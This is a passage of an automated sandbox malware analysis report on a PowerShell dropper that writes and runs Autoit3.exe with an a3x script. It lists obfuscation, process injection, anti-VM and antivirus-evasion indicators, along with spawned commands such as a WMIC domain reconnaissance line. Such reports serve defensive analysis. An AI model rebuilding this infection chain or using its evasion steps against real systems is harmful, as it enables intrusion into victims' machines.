            Source: C:\downloads\Autoit3.exe | Section loaded: libeay32.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: ssleay32.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: libssl32.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: urlmon.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: iertutil.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: srvcli.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: netutils.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: msxml6.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: vcruntime140.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: vbscript.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

            Data Obfuscation

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($base64)));Set-Clipboard -Value " ";exit;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleV
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0087C6D9 LoadLibraryA,GetProcAddress,3_2_0087C6D9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B95BB70 push eax; iretd 0_2_00007FFD9B95BB71
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B950B31 push eax; ret 0_2_00007FFD9B950B51
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B95B4F2 push edx; retf 0_2_00007FFD9B95B4F3
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0082E93F push edi; ret 3_2_0082E941
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00868A4A push FFFFFF8Bh; iretd 3_2_00868A4C
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0082EA58 push esi; ret 3_2_0082EA5A
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00828B75 push ecx; ret 3_2_00828B88
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0082EC33 push esi; ret 3_2_0082EC35
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0082ED1C push edi; ret 3_2_0082ED1E
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D393D push 011D3969h; ret 3_2_011D3961
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D4925 push ecx; mov dword ptr [esp], eax 3_2_011D4926
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D715F push 011D71D0h; ret 3_2_011D71C8
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D3975 push 011D3C21h; ret 3_2_011D3C19
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D7161 push 011D71D0h; ret 3_2_011D71C8
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D3815 push 011D3841h; ret 3_2_011D3839
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D7B05 push 011D7B2Bh; ret 3_2_011D7B23
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D3BF5 push 011D3C21h; ret 3_2_011D3C19
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D3595 push 011D35E6h; ret 3_2_011D35DE
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D15F9 push eax; ret 3_2_011D1635
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D37DD push 011D3809h; ret 3_2_011D3801
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D6FE1 push 011D715Dh; ret 3_2_011D7155
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CE4360 push 03CE4389h; ret 3_2_03CE4381
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D182B8 push 03D182E4h; ret 3_2_03D182DC
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CE62B0 push 03CE62DCh; ret 3_2_03CE62D4
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CD424C push 03CD4278h; ret 3_2_03CD4270
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CDA26C push 03CDA298h; ret 3_2_03CDA290
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CDA150 push 03CDA17Ch; ret 3_2_03CDA174
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CD4174 push 03CD41C1h; ret 3_2_03CD41B9
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CD4173 push 03CD41C1h; ret 3_2_03CD41B9
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CEA104 push 03CEA130h; ret 3_2_03CEA128
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D180E0 push 03D1810Ch; ret 3_2_03D18104

            Persistence and Installation Behavior

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\downloads\Autoit3.exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_008859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_008859B3
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00815EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00815EDA
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_008233B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_008233B7
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\downloads\Autoit3.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SUPERANTISPYWARE.EXE
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4041
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5819
            Source: C:\downloads\Autoit3.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_3-142196
            Source: C:\downloads\Autoit3.exe | API coverage: 4.7 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464 | Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Domain FROM Win32_ComputerSystem
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00864005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00864005
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0086C2FF
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086494A GetFileAttributesW,FindFirstFileW,FindClose,3_2_0086494A
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_0086CD9F
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086CD14 FindFirstFileW,FindClose,3_2_0086CD14
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0086F5D8
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0086F735
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0086FA36
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00863CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00863CE2
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D2F39 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_011D2F39
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D1F314 FindFirstFileW,FindNextFileW,FindClose,3_2_03D1F314
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D1DF18 FindFirstFileW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose,3_2_03D1DF18
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CF9DF0 FindFirstFileW,FindNextFileW,FindClose,3_2_03CF9DF0
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00815D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00815D13
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
            Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: microsoft hyper-v video
            Source: Autoit3.exe, 00000003.00000002.1742020740.00000000011E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: powershell.exe, 00000000.00000002.1799390815.0000024DE2394000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
            Source: C:\downloads\Autoit3.exe | API call chain: ExitProcess graph end node graph_3-141404
            Source: C:\downloads\Autoit3.exe | API call chain: ExitProcess graph end node graph_3-140998
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_008745D5 BlockInput,3_2_008745D5
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00815240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00815240
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00835CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_00835CAC
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0087C6D9 LoadLibraryA,GetProcAddress,3_2_0087C6D9
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_011DFB3A mov eax, dword ptr fs:[00000030h] 3_2_011DFB3A
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CEC0EC mov eax, dword ptr fs:[00000030h] 3_2_03CEC0EC
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CF6FD8 mov eax, dword ptr fs:[00000030h] 3_2_03CF6FD8
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_008588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,3_2_008588CD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0082A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0082A385
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0082A354 SetUnhandledExceptionFilter,3_2_0082A354

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CEFBF0 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,3_2_03CEFBF0
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00859369 LogonUserW,3_2_00859369
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00815240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00815240
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00861AC6 SendInput,keybd_event,3_2_00861AC6
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_008651E2 mouse_event,3_2_008651E2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\downloads\Autoit3.exe "C:\downloads\Autoit3.exe" c:\\downloads\script.a3x
            Source: C:\downloads\Autoit3.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehaheb
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domain
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_008588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,3_2_008588CD
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_00864F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_00864F1C
            Source: Autoit3.exe, 00000003.00000000.1713595565.00000000008B6000.00000002.00000001.01000000.00000009.sdmp, Autoit3.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Autoit3.exe | Binary or memory string: Shell_TrayWnd
            Source: C:\downloads\Autoit3.exe | Code function: 3_2_0082885B cpuid 3_2_0082885B
            Source: C:\downloads\Autoit3.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_011D3111
            Source: C:\downloads\Autoit3.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_011D321B
            Source: C:\downloads\Autoit3.exe | Code function: GetLocaleInfoA,3_2_011D3521
            Source: C:\downloads\Autoit3.exe | Code function: GetLocaleInfoA,3_2_011D5439
            Source: C:\downloads\Autoit3.exe | Code function: GetLocaleInfoA,3_2_011D5485
            Source: C:\downloads\Autoit3.exe | Code function: GetLocaleInfoA,GetACP,3_2_011D6695
            Source: C:\downloads\Autoit3.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_03CC5C24
            Source: C:\downloads\Autoit3.exe | Code function: GetLocaleInfoA,3_2_03CC6578
            Source: C:\downloads\Autoit3.exe | Code function: GetLocaleInfoA,3_2_03CCCBE4
            Source: C:\downloads\Autoit3.exe | Code function: GetLocaleInfoA,3_2_03CCB5C8
            Source: C:\downloads\Autoit3.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_03CC5D2E
            Source: C:\downloads\Autoit3.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\downloads\Autoit3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
